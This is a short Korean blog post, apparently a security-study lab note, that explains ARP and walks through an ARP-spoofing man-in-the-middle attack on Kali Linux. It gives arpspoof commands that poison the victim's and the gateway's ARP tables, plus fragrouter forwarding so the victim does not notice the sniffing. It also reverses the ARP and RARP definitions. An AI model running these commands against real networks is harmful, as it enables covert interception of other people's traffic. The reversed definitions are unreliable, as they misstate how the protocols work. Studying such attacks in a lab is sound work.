EASY7
ARPSpoofing 실습 본문
ARP
ARP(Address Resolution Protocol)은 네트워크 계층의 프로토콜이다.
ARP는 MAC주소를 IP를 변환하는 프로토콜이며, RARP는 IP를 MAC주소를 변환시켜주는 프로토콜이다.
컴퓨터에는 ARP table이라는 IP와 MAC주소의 매핑 테이블이 있어서 저장하며 주기적으로 업데이트해준다.
ART테이블 보는 법
#arp -a
ARPSpoofing
상대방의 ARP table을 속여서 스니핑하는 법
1. 3개의 터미널 열기 (ctrl+shift+t)
2. 다음 세 작업해주기
root@kali:~#arpspoof [-i 인터페이스]-t 피해자IP 게이트웨이IP
해석 : 피해자야! 게이트웨이 IP의 MAC주소는 나야.
*i는 인터페이스, t는 target이다.
root@kali:~#fragrouter -B1
해석: 내가 스니핑하는 것을 알아채지 못하도록 정상적으로 포워딩해준다.
피해자->게이트웨이 포워딩
게이트웨이->피해자 포워딩
root@kali:~#arpspoof -t 게이트웨이IP 피해자IP
해석: 게이트웨이야 피해자IP의 MAC주소는 나야~
'보안 공부 > 취약점 실습' 카테고리의 다른 글
FOCA를 이용한 정보 수집 (0) | 2019.08.03 |
---|---|
프린트 해킹 (0) | 2019.08.02 |
몽고디비 취약점 (0) | 2019.08.02 |
Shodan 쇼단 사용법 (0) | 2019.08.02 |
pentest (0) | 2019.08.02 |
Comments